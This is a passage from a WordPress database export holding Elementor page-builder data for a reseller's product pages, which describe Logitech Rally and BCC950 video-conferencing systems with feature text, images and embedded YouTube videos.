rooms.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a0aee94\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"218bc5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"434bad8\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0624977\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cb4a385\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d24280\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/uwx62jjxOnE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"742163f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b70394f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd1e4d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"92a5761\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"c4d9848\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADVANCED MODULAR AUDIO<\\/h3><p>Crystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound that\\u0092s natural, crisp, and highly intelligible. Logitech RightSound\\u0099\\u2122 enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a921491\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"3fa5585\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp.jpg\",\"id\":2911}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58834df\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5c2d6f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"456e282\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-1.jpg\",\"id\":2912}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"fc84764\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b27f55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Every component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f623216\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3614128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61805be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of technologies built into Rally that automate a better user experience. RightSight\\u2122 perfectly auto-frames participants no matter their distance from the lens. RightLight\\u2122 prioritizes faces over environment to render natural-looking skin tones while RightSound\\u0099\\u2122 enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings \\u2014 \\u0097automatically!<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7601a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d30db6c\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"612d913\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12cc4b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4df284a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-2.jpg\",\"id\":2913}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b51f998\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7afaa26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMART CABLING AND CONTENT SHARING<\\/h3><p>With a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b6a06a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f826d19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-3.jpg\",\"id\":2914}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2473dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"470dd3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b2bfdfa\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a54b538\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a87eb99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1331\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SEE EVERYONE, PERFECTLY FRAMED<\\/h4><p>Logitech RightSight\\u0099 camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9238ce1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e400259\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LET THE SUNSHINE IN<\\/h4><p>Even in meeting rooms with bright windows, Logitech RightLight\\u0099 technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c3cf6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"628d3e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADAPTIVE PAN, TILT AND ZOOM<\\/h4><p>Pan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a14cdde\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af2bc65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FRONT OF ROOM AUDIO<\\/h4><p>Unlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'\\u0092s voice and video both come from the same place \\u0097 and never from behind you \\u2014 \\u0097 so conversations feel more natural and lifelike.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"92dbf40\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3b7da92\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917f02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIONAL MOUNTING KIT<\\/h4><p>Add Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8f441a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c1a745e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LOUD AND CLEAR<\\/h4><p>The Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af53cbc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"18b598e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>UP TO 7 MIC PODS<\\/h4><p>For rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7e4f1f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e7ae67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FLEXIBLE MIC POD CABLING<\\/h4><p>A more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a45d7e6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"722f670\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"61e2996\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5735,2978,'_elementor_version','0.4'),(5737,2906,'_oembed_9654c19bd19fc23389d74603b60be7a7','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/uwx62jjxOnE?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5738,2906,'_oembed_time_9654c19bd19fc23389d74603b60be7a7','1551682350'),(5739,2906,'_oembed_b2944ddc4cce0daf95f504cfcecc2220','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/-xGIqpPOyXs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5740,2906,'_oembed_time_b2944ddc4cce0daf95f504cfcecc2220','1551682351'),(5757,2981,'_elementor_data','[{\"id\":\"e67c766\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca10afa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8f36e2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>BCC950<\\/p><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p><ul><li>All-in-one design is easy to use and saves space<\\/li><li>Plug-and-play convenience for Windows and Mac<\\/li><li>Clear HD video and audio at an affordable price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1e36051\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7980e42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.png\",\"id\":2974},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4249efb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff0e7b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"681793a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A GREAT VALUE FOR SMALL TEAMS<\\/h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34e1294\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f991f7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9e7d04\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ce7881c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b6f6ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"85c89bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950.jpg\",\"id\":2975}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a65f538\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7322827\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL-IN-ONE DESIGN<\\/h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, it\\u2019s everything you need to conduct a small video conference with up to 4 people in one room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8a2fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae55cf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"145fac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR PRODUCTIVE TEAMS<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"92590fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcf04ec\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.jpg\",\"id\":2976}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"39d591c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9b4c8a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"75f8cc3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-2.jpg\",\"id\":2977}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"46d9b0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5237705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EYE-TO-EYE<\\/h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f49d7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"57a53a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b1aa83\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"046b82f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1fcc22a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04cd561\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NATURAL SOUND<\\/h4><p><span style=\\\"font-size: 0.875rem;\\\">With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed104d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65eb196\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HANDHELD REMOTE CONTROL<\\/h4><p>Control BCC950\\u2019s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7389e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b70d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. There\\u2019s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f58cd2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e316d80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>QUALITY OPTICS<\\/h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180\\u00b0 across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"15bb0bc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1097234\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05b1de0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5756,2981,'_elementor_template_type','post'),(5754,2981,'_wp_page_template','template-fullwidth.php'),(5755,2981,'_elementor_edit_mode','builder'),(5753,2972,'_elementor_data','[{\"id\":\"e67c766\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca10afa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8f36e2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>BCC950<\\/h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p><ul><li>All-in-one design is easy to use and saves space<\\/li><li>Plug-and-play convenience for Windows and Mac<\\/li><li>Clear HD video and audio at an affordable price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1e36051\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7980e42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.png\",\"id\":2974},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4249efb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff0e7b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"681793a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A GREAT VALUE FOR SMALL TEAMS<\\/h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34e1294\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f991f7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9e7d04\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ce7881c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b6f6ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"85c89bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950.jpg\",\"id\":2975}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a65f538\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7322827\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL-IN-ONE DESIGN<\\/h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, it\\u2019s everything you need to conduct a small video conference with up to 4 people in one room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8a2fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae55cf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"145fac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR PRODUCTIVE TEAMS<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"92590fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcf04ec\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.jpg\",\"id\":2976}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"39d591c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9b4c8a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"75f8cc3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-2.jpg\",\"id\":2977}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"46d9b0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"5237705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EYE-TO-EYE<\\/h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f49d7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"57a53a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b1aa83\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"046b82f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1fcc22a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04cd561\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NATURAL SOUND<\\/h4><p><span style=\\\"font-size: 0.875rem;\\\">With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed104d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65eb196\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HANDHELD REMOTE CONTROL<\\/h4><p>Control BCC950\\u2019s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7389e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b70d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. There\\u2019s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your 